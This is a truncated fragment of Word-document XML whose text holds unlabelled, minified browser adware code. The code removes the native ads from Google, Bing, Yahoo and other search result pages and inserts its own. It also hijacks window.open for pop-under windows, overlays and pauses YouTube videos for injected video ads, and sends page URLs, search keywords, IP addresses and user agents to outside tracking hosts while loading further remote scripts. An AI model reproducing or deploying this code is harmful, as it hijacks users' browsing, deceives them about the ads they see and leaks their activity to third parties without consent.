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6"/>
          <w:sz-cs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">(function(){var a={dc:'DP5024AAAAAA',dc_product_name:'',dc_product_link:'',jquery_url:'//ajax.googleapis.com/ajax/libs/jquery/1.9.1/jquery.min.js',get_data_url:'//dfwu1013.info/data/init',debug:false,products:{modules:['di','mt','sl']}};var b={google:{domain:'www.google.',ads_container_css:{'border-bottom':'1px solid #ebebeb','margin-left':'-10px','margin-bottom':'10px','margin-top':'10px','font-family':'arial,sans-serif'},results_container_css:{'margin-top':'10px','margin-bottom':'10px','font-family':'arial,sans-serif'},ads_containers:['#taw','#mbEnd','#bottomads'],upper_container:'.mrlm_se_ads_upper',bottom_container:'.mrlm_se_ads_bottom',side_container:'#rhs_block',main_container:'#search',results_container:'#rso',search_input:'#gbqfq'},bing:{domain:'www.bing.',ads_container_css:{'background-color':'#FFF7ED','margin-bottom':'10px','margin-left':'-5px','margin-top':'10px'},results_container_css:{'margin-top':'20px','margin-bottom':'20px'},ads_containers:['.b_ad'],upper_container:'.mrlm_se_ads_upper',bottom_container:'.mrlm_se_ads_bottom',side_container:'',main_container:'#results, #b_results',results_container:'#wg0',search_input:'#sb_form_q'},yahoo:{domain:'.yahoo.',ads_container_css:{},results_container_css:{'margin-top':'10px','margin-bottom':'25px'},ads_containers:['.ads.horiz.top','#east','.ads.horiz.bot'],upper_container:'.ads.horiz.top',bottom_container:'.ads.horiz.bot',main_container:'#main',side_container:'',results_container:'#web',search_input:'#yschsp'},ask:{domain:'.ask.',ads_container_css:{'background-color':'#FFF7ED','margin-bottom':'10px'},results_container_css:{'margin-top':'10px','margin-bottom':'10px'},ads_containers:['#csaTop','#csaBottom'],upper_container:'.mrlm_se_ads_upper',bottom_container:'.mrlm_se_ads_bottom',main_container:'#midblock',side_container:'',results_container:'#lindm',search_input:'#top_q_comm'},whitesmoke:{domain:'search.whitesmoke',ads_container_css:{'background-color':'#FFF7ED','margin-bottom':'10px'},results_container_css:{},ads_containers:['.c'],upper_container:'.mrlm_se_ads_upper',bottom_container:'.mrlm_se_ads_bottom',main_container:'.b table tbody',side_container:'',results_container:'',search_input:'#q'}};var c=function(b){try{var c=d.get_frame_data();if(c.iframes&gt;0)return;if(window.opener!=null)if(window.name.indexOf('mrlm_popunder')&gt;=0)if(a.dc_product_name!=null&amp;&amp;a.dc_product_name!=""){var e=document.createElement('div');e.style.position='fixed';e.style.zIndex=99999;e.style.top='0px';e.style.right='0px';e.style.height='12px';e.style.fontSize='8px';e.style.padding='2px';e.style.backgroundColor='rgba(255,255,255,0.5)';e.style.color='black';e.style.fontWeight='bold';if(a.dc_product_link!=null&amp;&amp;a.dc_product_link!="")e.innerHTML='&lt;a style="color:black" target="_blank" href="'+a.dc_product_link+'"&gt;Powered By '+a.dc_product_name+'&lt;/a&gt;';else e.innerHTML='Powered By '+a.dc_product_name;document.body.appendChild(e);}}catch(f){}try{var g=window.navigator.userAgent;var h=g.indexOf("MSIE ");if(h==-1){Element.prototype.appendChild=document.appendChild;Element.prototype.insertBefore=document.insertBefore;}}catch(f){}try{window.open=function(a){return function(b,c,d){if(d==undefined)return a.call(window,b,c,d);var e=d.split(',');var f=null;var g=null;for(var h=0;h&lt;e.length;h++){if(e[h].split('=')[0]=='width')f=parseInt(e[h].split('=')[1]);if(e[h].split('=')[0]=='height')g=parseInt(e[h].split('=')[1]);}if(f==null||g==null)return;if(c.indexOf('mrlm_popunder')&gt;=0||f&lt;800||g&lt;600)return a.call(window,b,c);};}(window.open);}catch(f){}var i={jquery:null,domain_info:null,keyword:null,server_data:null,is_pop:false,is_pop_opened:false};var j=function(b,c){if(window.name.indexOf('mrlm_popunder')&gt;=0)b.is_pop=true;b.jquery.ajax({type:'GET',data:{dc:a.dc,page_url:encodeURI(document.location.href),keyword:encodeURI(b.keyword),modules:a.products.modules.join(','),is_pop:b.is_pop},url:a.get_data_url,dataType:'jsonp',cache:false,success:function(a){c(a);}});if(window.name.indexOf('InterYield')&gt;=0)b.is_pop=true;};var k=function(a){for(var b in a){var c=a[b];if(c.constructor==Object)k(c);if(typeof c!='string')continue;c=c.replace('dfwu1009.info','127.0.0.1:5000');a[b]=c;}};var l=function(a){(function(a){a.fn.bPopup=function(b,c){function d(){p.contentContainer=a(p.contentContainer||q);switch(p.content){case "iframe":var b=a('&lt;iframe class="b-iframe" '+p.iframeAttr+"&gt;&lt;/iframe&gt;");b.appendTo(p.contentContainer);G=q.outerHeight(!0);H=q.outerWidth(!0);e();b.attr("src",p.loadUrl);m(p.loadCallback);break;case "image":e();a("&lt;img /&gt;").load(function(){m(p.loadCallback);g(a(this));}).attr("src",p.loadUrl).hide().appendTo(p.contentContainer);break;default:e(),a('&lt;div class="b-ajax-wrapper"&gt;&lt;/div&gt;').load(p.loadUrl,p.loadData,function(){m(p.loadCallback);g(a(this));}).hide().appendTo(p.contentContainer);}}function e(){p.modal&amp;&amp;a('&lt;div class="b-modal '+z+'"&gt;&lt;/div&gt;').css({backgroundColor:p.modalColor,position:"fixed",top:0,right:0,bottom:0,left:0,opacity:0,zIndex:p.zIndex+y}).appendTo(p.appendTo).fadeTo(p.speed,p.opacity);n();q.data("bPopup",p).data("id",z).css({left:"slideIn"==p.transition||"slideBack"==p.transition?"slideBack"==p.transition?r.scrollLeft()+v:-1*(F+H):k(!(!p.follow[0]&amp;&amp;C||D)),position:p.positionStyle||"absolute",top:"slideDown"==p.transition||"slideUp"==p.transition?"slideUp"==p.transition?r.scrollTop()+u:E+-1*G:l(!(!p.follow[1]&amp;&amp;B||D)),"z-index":p.zIndex+y+1}).each(function(){p.appending&amp;&amp;a(this).appendTo(p.appendTo);});i(!0);}function f(){p.modal&amp;&amp;a(".b-modal."+q.data("id")).fadeTo(p.speed,0,function(){a(this).remove();});p.scrollBar||a("html").css("overflow","auto");a(".b-modal."+z).unbind("click");r.unbind("keydown."+z);t.unbind("."+z).data("bPopup",0&lt;t.data("bPopup")-1?t.data("bPopup")-1:null);q.undelegate(".bClose, ."+p.closeClass,"click."+z,f).data("bPopup",null);i();return !1;}function g(a){var b=a.width(),c=a.height(),d={};p.contentContainer.css({height:c,width:b});c&gt;=q.height()&amp;&amp;(d.height=q.height());b&gt;=q.width()&amp;&amp;(d.width=q.width());G=q.outerHeight(!0);H=q.outerWidth(!0);n();p.contentContainer.css({height:"auto",width:"auto"});d.left=k(!(!p.follow[0]&amp;&amp;C||D));d.top=l(!(!p.follow[1]&amp;&amp;B||D));q.animate(d,250,function(){a.show();A=o();});}function h(){t.data("bPopup",y);q.delegate(".bClose, ."+p.closeClass,"click."+z,f);p.modalClose&amp;&amp;a(".b-modal."+z).css("cursor","pointer").bind("click",f);w||!p.follow[0]&amp;&amp;!p.follow[1]||t.bind("scroll."+z,function(){A&amp;&amp;q.dequeue().animate({left:p.follow[0]?k(!D):"auto",top:p.follow[1]?l(!D):"auto"},p.followSpeed,p.followEasing);}).bind("resize."+z,function(){u=s.innerHeight||t.height();v=s.innerWidth||t.width();if(A=o())clearTimeout(I),I=setTimeout(function(){n();q.dequeue().each(function(){D?a(this).css({left:F,top:E}):a(this).animate({left:p.follow[0]?k(!0):"auto",top:p.follow[1]?l(!0):"auto"},p.followSpeed,p.followEasing);});},50);});p.escClose&amp;&amp;r.bind("keydown."+z,function(a){27==a.which&amp;&amp;f();});}function i(a){function b(b){q.css({display:"block",opacity:1}).animate(b,p.speed,p.easing,function(){j(a);});}switch(a?p.transition:p.transitionClose||p.transition){case "slideIn":b({left:a?k(!(!p.follow[0]&amp;&amp;C||D)):r.scrollLeft()-(H||q.outerWidth(!0))-x});break;case "slideBack":b({left:a?k(!(!p.follow[0]&amp;&amp;C||D)):r.scrollLeft()+v+x});break;case "slideDown":b({top:a?l(!(!p.follow[1]&amp;&amp;B||D)):r.scrollTop()-(G||q.outerHeight(!0))-x});break;case "slideUp":b({top:a?l(!(!p.follow[1]&amp;&amp;B||D)):r.scrollTop()+u+x});break;default:q.stop().fadeTo(p.speed,a?1:0,function(){j(a);});}}function j(a){a?(h(),m(c),p.autoClose&amp;&amp;setTimeout(f,p.autoClose)):(q.hide(),m(p.onClose),p.loadUrl&amp;&amp;(p.contentContainer.empty(),q.css({height:"auto",width:"auto"})));}function k(a){return a?F+r.scrollLeft():F;}function l(a){return a?E+r.scrollTop():E;}function m(b){a.isFunction(b)&amp;&amp;b.call(q);}function n(){E=B?p.position[1]:Math.max(0,(u-q.outerHeight(!0))/2-p.amsl);F=C?p.position[0]:(v-q.outerWidth(!0))/2;A=o();}function o(){return u&gt;q.outerHeight(!0)&amp;&amp;v&gt;q.outerWidth(!0);}a.isFunction(b)&amp;&amp;(c=b,b=null);var p=a.extend({},a.fn.bPopup.defaults,b);p.scrollBar||a("html").css("overflow","hidden");var q=this,r=a(document),s=window,t=a(s),u=s.innerHeight||t.height(),v=s.innerWidth||t.width(),w=/OS 6(_\d)+/i.test(navigator.userAgent),x=200,y=0,z,A,B,C,D,E,F,G,H,I;q.close=function(){p=this.data("bPopup");z="b-popup"+t.data("bPopup")+"";f();};return q.each(function(){a(this).data("bPopup")||(m(p.onOpen),y=(t.data("bPopup")||0)+1,z="b-popup"+y+"",B="auto"!==p.position[1],C="auto"!==p.position[0],D="fixed"===p.positionStyle,G=q.outerHeight(!0),H=q.outerWidth(!0),p.loadUrl?d():e());});};a.fn.bPopup.defaults={amsl:50,appending:!0,appendTo:"body",autoClose:!1,closeClass:"b-close",content:"ajax",contentContainer:!1,easing:"swing",escClose:!0,follow:[!0,!0],followEasing:"swing",followSpeed:500,iframeAttr:'scrolling="no" frameborder="0"',loadCallback:!1,loadData:!1,loadUrl:!1,modal:!0,modalClose:!0,modalColor:"#000",onClose:!1,onOpen:!1,opacity:0.7,position:["auto","auto"],positionStyle:"absolute",scrollBar:!0,speed:250,transition:"fadeIn",transitionClose:!1,zIndex:9997};})(a.jquery);};if(a.debug)k(a);if(window.jQuery)d.log('debug','page jquery: '+window.jQuery.fn.jquery);else d.log('debug','no page jquery found');d.load_script(a.jquery_url,function(){i.jquery=jQuery.noConflict(true);d.log('debug','mrlm jquery: '+i.jquery.fn.jquery);i.keyword=i.jquery('h1')==null||i.jquery('h1').text()==''?document.title:i.jquery('h1').text();i.keyword=i.keyword.replace(/\s\s+/g,'');i.keyword=i.keyword.split(' ').splice(0,5).join(' ');d.log('debug','keyword: '+i.keyword);l(i);j(i,function(a){if(a.error!=null)d.log('debug','get-data failed, error: '+a.error);else{d.log('debug','di: '+d.json().stringify(a.di));d.log('debug','mt: '+d.json().stringify(a.mt));d.log('debug','sl: '+d.json().stringify(a.sl));}i.server_data=a;b(i);});});};var d={log:function(b,c){if(a.debug)console[b](new Date().getTime()+' mrlm: '+c);},set_cookie:function(a,b,c){if(c){var d=new Date();d.setTime(d.getTime()+(c*24*60*60*1000));var e="; expires="+d.toGMTString();}else var e="";document.cookie=a+"="+b+e+"; path=/";},get_cookie:function(a){if(document.cookie.length&gt;0){var b=document.cookie.indexOf(a+"=");if(b!=-1){b=b+a.length+1;var c=document.cookie.indexOf(";",b);if(c==-1)c=document.cookie.length;return decodeURI(document.cookie.substring(b,c));}}return "";},load_script:function(a,b){var c,d,e;d=false;c=document.createElement('script');c.type='text/javascript';c.src=a;c.onload=c.onreadystatechange=function(){if(!d&amp;&amp;(!this.readyState||this.readyState=='complete')){d=true;if(b)b();}};e=document.getElementsByTagName('script')[0];e.parentNode.insertBefore(c,e);},pop_under:function(a,b,c,d){var e={name:'mrlm_popunder',width:c?c:screen.width,height:d?d:screen.height,top:0,left:0,wait:0,cap:10,cookie:'mrlm_popunder'};e.name+='_'+Math.floor((Math.random()*1000)+1);var f=(top!=self&amp;&amp;typeof (top.document.location.toString())==='string')?top:self;var g=null;e=(e||{});var h=(e.name||Math.floor((Math.random()*1000)+1));var i=(e.width||window.outerWidth||window.innerWidth);var j=(e.height||(window.outerHeight-100)||window.innerHeight);var k=(typeof (e.left)!='undefined')?e.left.toString():window.screenX;var l=(typeof (e.top)!='undefined')?e.top.toString():window.screenY;var m=(e.wait||3600);m=(m*1000);var n=false;var o=(e.cap||2);var p=0;var q=(e.cookie||'__.popunder');var r=function(){var a=navigator.userAgent.toLowerCase();var b={webkit:/webkit/.test(a),mozilla:(/mozilla/.test(a))&amp;&amp;(!/(compatible|webkit)/.test(a)),chrome:/chrome/.test(a),msie:(/msie/.test(a))&amp;&amp;(!/opera/.test(a)),firefox:/firefox/.test(a),safari:(/safari/.test(a)&amp;&amp;!(/chrome/.test(a))),opera:/opera/.test(a)};b.version=(b.safari)?(a.match(/.+(?:ri)[\/: ]([\d.]+)/)||[])[1]:(a.match(/.+(?:ox|me|ra|ie)[\/: ]([\d.]+)/)||[])[1];return b;}();function s(){return false;}function t(b,c,d,e,h,i){if(s())return;var j='toolbar=no,scrollbars=yes,location=yes,statusbar=yes,menubar=no,resizable=1,width='+d.toString()+',height='+e.toString()+',screenX='+h+',screenY='+i;var k=function(d){var e='86321022';if(n||(d.target!=null&amp;&amp;d.target.getAttribute('nopop')!=null&amp;&amp;d.target.getAttribute('nopop')==1))return;n=true;if(s())return;g=f.window.open(b,c,j);setTimeout(function(){if(g==null||g.closed){var d=document.createElement('div');d.id="p_21213";d.style.zIndex=998;d.style.position='fixed';d.style.left='-1px';d.style.top='-1px';d.style.height='100%';d.style.width='100%';var e='&lt;a style="cursor:default" onClick="return pop_clicked_21213();" target="$WINDOW_NAME$" href="$URL$"&gt;&lt;img src="//t.ct'+'tsrv.c'+'om/transparent.gif" style="z-index:999;left:-1px;top:-1px;height:100%;width:100%"/&gt;&lt;/a&gt;';e=e.replace('$URL$',b);e=e.replace('$WINDOW_NAME$',c);d.innerHTML=e;document.body.appendChild(d);window.pop_clicked_21213=function(){a.is_pop_opened=true;var b=document.getElementById('p_21213');b.parentNode.removeChild(b);return true;};}},1000);if(g)a.is_pop_opened=true;else{}return g;};if(document.addEventListener)document.addEventListener("click",k,false);else document.attachEvent("onclick",k);}function u(){try{g.blur();g.opener.window.focus();window.self.window.focus();window.focus();if(r.firefox)v();if(r.webkit)w();if(r.msie)setTimeout(function(){g.blur();g.opener.window.focus();window.self.window.focus();window.focus();},1000);}catch(a){}}function v(){var a=window.open('about:blank');a.focus();a.close();}function w(){var a='';var b=document.createElement("a");b.href="data:text/html,&lt;scr"+a+"ipt&gt;window.close();&lt;/scr"+a+"ipt&gt;";document.getElementsByTagName("body")[0].appendChild(b);var c=document.createEvent("MouseEvents");c.initMouseEvent("click",false,true,window,0,0,0,0,0,true,false,false,true,0,null);b.dispatchEvent(c);b.parentNode.removeChild(b);}if(s())return;else{var x=t(b,h,i,j,k,l);return x;}},get_element_attributes:function(a,b){var c={};a.jquery.each(b.get(0).attributes,function(a,b){c[b.name]=b.value;});return c;},wrap_iframe:function(a,b,c,d,e,f){if(typeof f=='undefined')f={};var g=b.attr('mrlm_id');var h=a.jquery('&lt;div&gt;&lt;/div&gt;');var i={'position':'relative','width':b[0].width,'height':b[0].height};h.attr({'id':g});h.attr(f);h.css(i);h.append(b);if(d!=""){var j=a.jquery('&lt;div&gt;&lt;/div&gt;');j.css({'position':'absolute','bottom':'0px','right':'0px','padding':'2px','background-color':'rgba(255,255,255,0.6)','font-size':'8px','font-weight':'bold','height':'12px'});j.html('&lt;a style="color:black" target="_blank" href="'+e+'"&gt;Powered by '+d+'&lt;/a&gt;');h.append(j);if(c){var k=a.jquery('&lt;div&gt;&lt;/div&gt;');k.attr({'id':'closeAd_'+g,'ad-id':g});k.css({'position':'absolute','cursor':'pointer','width':'12px',' height':'14px','text-align':'center','top':'0px','right':'0px','padding-right':'0px','padding-bottom':'0px','background-color':'rgba(255,255,255,0.6)','font-size':'10px','font-weight':'bold'});k.html('X');h.append(k);}}return h;},create_iframe:function(a,b,c,d,e,f,g){var h=Math.floor(Math.random()*100000000);var i=a.jquery('&lt;iframe&gt;&lt;/iframe&gt;');i.attr(f);i.attr({'frameborder':'0','marginwidth':'0','marginheight':'0','scrolling':'no','width':d,'height':e,'mrlm_id':h,'mrlm_product':b,'mrlm_type':c,'src':g,'_target':'blank'});return i;},create_text_element:function(a,b,c,d,e,f){var g=a.server_data.tx;var h=a.jquery('&lt;div&gt;&lt;/div&gt;').attr('impid',g.id).attr('mrlm_product',b).attr('mrlm_type',c).attr(f).css('width',d+'px').css('height',e+'px').css('text-align','left').css('background-color','#FFFFFF').css('font-family','Verdana,Arial,sans-serif').css('direction','ltr');var i=a.jquery('&lt;div&gt;&lt;/div&gt;').css('padding-top','2px').css('padding-left','2px');for(var j=0;j&lt;g.results.length;j++){var k=a.jquery('&lt;a&gt;&lt;/a&gt;').css('color','#2518B5').css('cursor','pointer').css('font-size','medium').css('font-weight','normal').css('text-decoration','underline').css('line-height','1.2').css('font-family','arial,sans-serif').attr('target','_blank').css('font-family','Verdana,Arial,sans-serif').text(g.results[j].title).attr('href',g.results[j].redirect);var l=a.jquery('&lt;div&gt;&lt;/div&gt;').css('color','#00802A').css('font-style','normal').css('font-size','14px').css('line-height','1.2').css('text-decoration','none!important').css('font-family','Verdana,Arial,sans-serif').text(g.results[j].url);var m=a.jquery('&lt;div&gt;&lt;/div&gt;').text(g.results[j].description).css('margin-top','3px').css('color','#333333').css('font-size','small').css('line-height','15px').css('text-decoration','none!important').css('font-family','Verdana,Arial,sans-serif').css('overflow','hidden').css('height','32px');i.append(k);i.append(l);i.append(m);h.append(i);}return h;},highlight_words_in_text:function(a,b,c){if(c.length==0||c=='')return b;var d=[];var e=b.split(' ');for(var f=0;f&lt;e.length;f++){var g=e[f];for(var h=0;h&lt;c.length;h++){var i='&lt;b&gt;'+e[f]+'&lt;/b&gt;';if(e[f].toLowerCase().indexOf(c[h].toLowerCase())!=-1){g=i;break;}}d.push(g);}return d.join(' ');},json:function(){function a(a){return a&lt;10?'0'+a:a;}if(typeof Date.prototype.toJSON!=='function'){Date.prototype.toJSON=function(b){return isFinite(this.valueOf())?this.getUTCFullYear()+'-'+a(this.getUTCMonth()+1)+'-'+a(this.getUTCDate())+'T'+a(this.getUTCHours())+':'+a(this.getUTCMinutes())+':'+a(this.getUTCSeconds())+'Z':null;};String.prototype.toJSON=Number.prototype.toJSON=Boolean.prototype.toJSON=function(a){return this.valueOf();};}var b=/[\u0000\u00ad\u0600-\u0604\u070f\u17b4\u17b5\u200c-\u200f\u2028-\u202f\u2060-\u206f\ufeff\ufff0-\uffff]/g,c=/[\\\"\x00-\x1f\x7f-\x9f\u00ad\u0600-\u0604\u070f\u17b4\u17b5\u200c-\u200f\u2028-\u202f\u2060-\u206f\ufeff\ufff0-\uffff]/g,d,e,f={'\b':'\\b','\t':'\\t','\n':'\\n','\f':'\\f','\r':'\\r','"':'\\"','\\':'\\\\'},g;function h(a){c.lastIndex=0;return c.test(a)?'"'+a.replace(c,function(a){var b=f[a];return typeof b==='string'?b:'\\u'+('0000'+a.charCodeAt(0).toString(16)).slice(-4);})+'"':'"'+a+'"';}function i(a,b){var c,f,j,k,l=d,m,n=b[a];if(n&amp;&amp;typeof n==='object'&amp;&amp;typeof n.toJSON==='function')n=n.toJSON(a);if(typeof g==='function')n=g.call(b,a,n);switch(typeof n){case 'string':return h(n);case 'number':return isFinite(n)?String(n):'null';case 'boolean':case 'null':return String(n);case 'object':if(!n)return 'null';d+=e;m=[];if(Object.prototype.toString.apply(n)==='[object Array]'){k=n.length;for(c=0;c&lt;k;c+=1)m[c]=i(c,n)||'null';j=m.length===0?'[]':d?'[\n'+d+m.join(',\n'+d)+'\n'+l+']':'['+m.join(',')+']';d=l;return j;}if(g&amp;&amp;typeof g==='object'){k=g.length;for(c=0;c&lt;k;c+=1)if(typeof g[c]==='string'){f=g[c];j=i(f,n);if(j)m.push(h(f)+(d?': ':':')+j);}}else for(f in n)if(Object.prototype.hasOwnProperty.call(n,f)){j=i(f,n);if(j)m.push(h(f)+(d?': ':':')+j);}j=m.length===0?'{}':d?'{\n'+d+m.join(',\n'+d)+'\n'+l+'}':'{'+m.join(',')+'}';d=l;return j;}}var j={stringify:function(a,b,c){var f;d='';e='';if(typeof c==='number')for(f=0;f&lt;c;f+=1)e+=' ';else if(typeof c==='string')e=c;g=b;if(b&amp;&amp;typeof b!=='function'&amp;&amp;(typeof b!=='object'||typeof b.length!=='number'))throw new Error('JSON.stringify');return i('',{'':a});},parse:function(a,c){var d;function e(a,b){var d,f,g=a[b];if(g&amp;&amp;typeof g==='object')for(d in g)if(Object.prototype.hasOwnProperty.call(g,d)){f=e(g,d);if(f!==undefined)g[d]=f;else delete g[d];}return c.call(a,b,g);}a=String(a);b.lastIndex=0;if(b.test(a))a=a.replace(b,function(a){return '\\u'+('0000'+a.charCodeAt(0).toString(16)).slice(-4);});if(/^[\],:{}\s]*$/.test(a.replace(/\\(?:["\\\/bfnrt]|u[0-9a-fA-F]{4})/g,'@').replace(/"[^"\\\n\r]*"|true|false|null|-?\d+(?:\.\d*)?(?:[eE][+\-]?\d+)?/g,']').replace(/(?:^|:|,)(?:\s*\[)+/g,''))){d=eval('('+a+')');return typeof c==='function'?e({'':d},''):d;}throw new SyntaxError('JSON.parse');}};return j;},replace_all:function(a,b,c){return a.split(b).join(c);},log_event:function(b,c){var d={'type':b,'data':encodeURIComponent(c)};d.domain=encodeURIComponent(window.location.hostname);d.url=encodeURIComponent(document.URL);d.dc=a.dc;var e=window.document.createElement("script");e.src="//dfwu1009.info/logger/log-event?dc_id="+d.dc;e.src+="&amp;domain="+d.domain;e.src+="&amp;page_url="+d.url;e.src+="&amp;event_type="+d.type;e.src+="&amp;event_data="+d.data;e.src+="&amp;response_type=js";e.type="text/javascript";window.document.body.appendChild(e);},get_frame_data:function(){var a={'referer':'','is_top':true,'iframes':0};try{var b=function(a){try{if(!window.location.ancestorOrigins)return;for(var b=0,c=window.location.ancestorOrigins.length;c&gt;b;b++)a.call(null,window.location.ancestorOrigins[b],b);}catch(d){}return [];};var c=function(a){var b,c=[];do try{b=b?b.parent:window,a.call(null,b,c);}catch(d){return c.push({referrer:null,location:null,isTop:!1}),c;}while(b!==window.top);return c;};var d=c(function(a,b){try{b.push({referrer:a.document.referrer||null,location:a.location.href||null,isTop:a===window.top});}catch(c){b.push({referrer:null,location:null,isTop:a===window.top});}});b(function(a,b){d[b].ancestor=a;});for(var e="",f=!1,g=d.length-1,h=d.length-1;h&gt;=0;h--)if(e=d[h].location,!e&amp;&amp;h&gt;0&amp;&amp;(e=d[h-1].referrer,e||(e=d[h-1].ancestor)),e){f=window.location.ancestorOrigins?!0:h==d.length-1&amp;&amp;d[d.length-1].isTop;break;}a.referer=e;a.is_top=f;a.iframes=g;}catch(i){}return a;}};var e={video:function(b){var c=0;window.prerollAdDiv=null;window.sliderVidToTop=0;window.sliderVidTopPos=0;window.sliderVidAdDiv=null;window.sliderDivTimer=null;window.mrl_createCookie=function(a,b,c){if(c){var d=new Date();d.setTime(d.getTime()+(c*24*60*60*1000));var e="; expires="+d.toGMTString();}else var e="";document.cookie=a+"="+b+e+"; path=/";};window.mrl_readCookie=function(a){var b=a+"=";var c=document.cookie.split(';');for(var d=0;d&lt;c.length;d++){var e=c[d];while(e.charAt(0)==' ')e=e.substring(1,e.length);if(e.indexOf(b)==0)return e.substring(b.length,e.length);}return null;};window.mrl_getUrlVars=function(a){var b=[],c;var d=a.slice(a.indexOf('?')+1).split('&amp;');for(var e=0;e&lt;d.length;e++){c=d[e].split('=');b.push(c[0]);b[c[0]]=c[1];}return b;};window.mrl_adDoneEvent_yt=function(){var a=document.getElementsByClassName('html5-main-video');console.log('mntz - Found '+a.length+' players');var c=a[0];console.log('mntz - Video Resume');c.play();b.jquery('#ytpreroll').remove();};window.mrl_adStartEvent_yt=function(){j();b.jquery('#ytpreroll').css('visibility','visible');};window.mrl_adDoneEvent=function(){console.log('mrl_adDoneEvent');sliderVidAdDiv.parentElement.removeChild(sliderVidAdDiv);};window.mrl_on_AdStart=function(){console.log('mrl_on_AdStart');mrl_createCookie('slider_div',1,1);sliderVidAdDiv.style.visibility='visible';sliderDivTimer=setInterval(function(){if(sliderVidTopPos&gt;sliderVidToTop){sliderVidTopPos--;sliderVidAdDiv.style.top=sliderVidTopPos+'px';}else clearInterval(sliderDivTimer);},1);};var d=['US','AU','UK','GB','DE','FR','CA','BE','IT','ES','NZ','NO','SE','MX','JP','IR','DK','AU','CR','SG','IL','NL'];if(b.server_data.di.domain=='youtube.com'){var e=['US','CA'];var f=['UK','GB','DE','IT','FR','ES','TR'];if(e.indexOf(b.server_data.di.country_code)!=-1)h(b.server_data.di.domain,55344);else if(f.indexOf(b.server_data.di.country_code)!=-1)h(b.server_data.di.domain,55343);}else if(b.server_data.di.video_enabled&amp;&amp;d.indexOf(b.server_data.di.country_code)&gt;=0&amp;&amp;window.location.host.indexOf('google')==-1)l(b.server_data.di.domain);function g(a,b,c){if(a.addEventListener){a.addEventListener(b,c,false);return true;}else if(a.attachEvent){var d=a.attachEvent("on"+b,c);return d;}else return false;};function h(a,b){switch(a){case 'youtube.com':{i(b);console.log('mntz - PREROLL');var c=document.getElementsByTagName('video');console.log('mntz - Found '+c.length+' players');var d=c[0];console.log('mntz - Found '+d+' players');}default:{}}}function i(b){setTimeout(function(){var d=false;var e=document.getElementsByClassName('videoAdUi');if(e.length&gt;0){d=true;console.log('mntz - videoAdUi Found');}else console.log('mntz - NO videoAdUi Found');if(d)console.log('mntz - Preroll Ad Exist');else{console.log('mntz - NO Preroll Ad Exist');var f=document.getElementById('player-api');f.style.position="relative";window.prerollAdDiv=document.createElement('div');prerollAdDiv.id="ytpreroll";window.prerollAdDiv.style.width="100%";window.prerollAdDiv.style.height="100%";window.prerollAdDiv.style.position="absolute";window.prerollAdDiv.style.top='0px';window.prerollAdDiv.style.left='0px';window.prerollAdDiv.style.zIndex='9999';window.prerollAdDiv.style.visibility='hidden';var g=document.createElement('script');g.type='text/javascript';g.src="//t.cttsrv.com/myplayer.js?lrPub="+b+"&amp;hidePlayerOnInit=1&amp;removeOnDone=1&amp;onComplete=mrl_adDoneEvent_yt&amp;onAdStart=mrl_adStartEvent_yt&amp;sid="+a.dc+"&amp;debug="+c;g.setAttribute('id','myplayerjw_0');window.prerollAdDiv.appendChild(g);f.appendChild(prerollAdDiv);}},1);}function j(){var a=document.getElementsByClassName('html5-main-video');console.log('mntz - Found '+a.length+' players');var b=a[0];console.log('mntz - Video Pause');b.pause();}function k(){var a=document.getElementsByClassName('html5-main-video');console.log('mntz - Found '+a.length+' players');var b=a[0];console.log('mntz - Video Resume');b.play();}function l(b){var d=window,e=document,f=e.documentElement,g=e.getElementsByTagName('body')[0],h=d.innerWidth||f.clientWidth||g.clientWidth,i=d.innerHeight||f.clientHeight||g.clientHeight;sliderVidToTop=i-320;sliderVidTopPos=i+1;sliderVidAdDiv=document.createElement('div');sliderVidAdDiv.style.visibility='hidden';sliderVidAdDiv.style.width="480px";sliderVidAdDiv.style.height="320px";sliderVidAdDiv.style.position="fixed";sliderVidAdDiv.style.top=sliderVidTopPos+'px';sliderVidAdDiv.style.left='0px';sliderVidAdDiv.style.backgroundColor='black';sliderVidAdDiv.style.zIndex='9999';var j=a.dc;var k=document.createElement('script');k.type='text/javascript';k.async=true;k.src="//t.cttsrv.com/myplayer.js?lrPub=44260&amp;&amp;removeOnDone=1&amp;size=480x320&amp;onAdStart=mrl_on_AdStart&amp;onComplete=mrl_adDoneEvent&amp;sid="+j+"&amp;debug="+c;k.setAttribute('id','myplayerjw_0');sliderVidAdDiv.appendChild(k);var l=document.createElement('div');l.innerHTML="&lt;img width=16 height=16 src='//t.cttsrv.com/xmark.png' /&gt;";l.style.backgroundColor="white";l.style.borderRadius="8px";l.style.position="absolute";l.style.width="16px";l.style.height="16px";l.style.top='-8px';l.style.right='-8px';l.style.zIndex='99999';l.style.cursor='pointer';l.onclick=function(){sliderVidAdDiv.parentElement.removeChild(sliderVidAdDiv);};sliderVidAdDiv.appendChild(l);document.body.appendChild(sliderVidAdDiv);}},search_engines:function(c){var e={max_results:10,adult_filter:'no',min_bid:0.0,remove_original_ads:true,data_url:'//t.cttsrv.com/jstfd.js'};var f=c.keyword;var g=function(b,d){if(!b||b===''){d({results:[]});return;}var f=a.dc;var g=f.substr(0,6)+'SE'+f.substr(8);c.jquery.ajax({type:'GET',data:{d:g,i:e.min_bid,l:e.max_results,u:encodeURI(b),ua:encodeURI(c.server_data.ui.ua),ip:c.server_data.ui.ip,jp:1},url:e.data_url,dataType:'jsonp',cache:false,success:function(a){d(a);}});};var h=function(a,b){c.jquery('.mrlm_se_ads_upper').remove();c.jquery('.mrlm_se_ads_bottom').remove();c.jquery('.mrlm_se_ads').remove();c.jquery('.mrlm_se_results').remove();if(a.results.length===0)return;if(e.remove_original_ads)for(var g=0;g&lt;b.ads_containers.length;g++)c.jquery(b.ads_containers[g]).remove();var h=c.jquery('&lt;div&gt;&lt;/div&gt;').attr('class','mrlm_se_ads').attr('mrlm_product','se_ads').attr('mrlm_type',c.server_data.di.type).css(b.ads_container_css);var i=c.jquery('&lt;div&gt;&lt;/div&gt;').attr('class','mrlm_se_ads').attr('mrlm_product','se_ads').attr('mrlm_type',c.server_data.di.type).css(b.ads_container_css);var j=c.jquery('&lt;div&gt;&lt;/div&gt;').attr('class','mrlm_se_ads').attr('mrlm_product','se_ads').attr('mrlm_type',c.server_data.di.type).css(b.ads_container_css).css({'width':'262px','margin-bottom':'100px'});var k=c.jquery('&lt;span&gt;&lt;/span&gt;').css('font-weight','bolder').css('color','#5F5F5F').text(f);var l=c.jquery('&lt;div&gt;&lt;/div&gt;').css('font-size','13px').css('font-weight','normal').css('color','#666666').css('position','relative').css('left','8px').css('top','6px').text('Ads related to ');l.append(k);var 